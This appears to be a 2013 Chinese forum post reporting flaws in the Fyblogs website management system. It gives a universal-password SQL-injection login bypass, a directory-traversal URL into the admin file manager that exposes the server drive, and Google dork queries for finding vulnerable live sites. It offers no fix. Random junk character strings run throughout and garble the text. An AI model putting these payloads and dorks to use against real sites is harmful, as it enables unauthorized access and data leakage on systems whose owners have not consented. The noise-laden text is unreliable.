漏洞类型: 未授权访问/权限绕过: J, g: g+ `. b& F
# Z, d! W: C9 X6 O简要描述:2 S) o! A1 B( G
0 W. ^5 E9 Y( H6 x: y6 U& {9 }5 Z
Fyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!6 P X7 |. j* b7 Z: a3 O
! @; m1 x! B1 n6 [& w) @# F
详细说明:- Y( L1 O/ w F* a+ x
D" X0 A7 y! a( K' p
后台万能密码 'or'='or'
( y6 [0 z# T2 ?$ ] K# S/ m后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
n, I) g" t' l& gadmin/uploadfile.asp?currentFolder=/upfiles/../
- H: \ t: U& {
) K$ U6 k1 y- ?, y漏洞证明:
6 _, \* `+ m# j: f$ h! e( ~6 e5 U+ ^3 I2 s# d
谷歌:inurl:type.asp?id=1 新闻中心
0 R. u4 d( n5 P* ~/ }8 z9 `7 f或者 :inurl:download_ok.asp?
6 G" |0 Z- ~9 ~8 b3 c2 x, ~0 H( ?
5 {7 a- L2 v! a' |5 K) ^可以测试. h/ _5 e; z2 O3 j% b7 ^1 e
; X" |* }4 G# Q9 C7 C" k
7 S: t- ?0 g" S/ Y$ Y* F
|
发表于 2013-3-7 13:07:46
收藏
支持
反对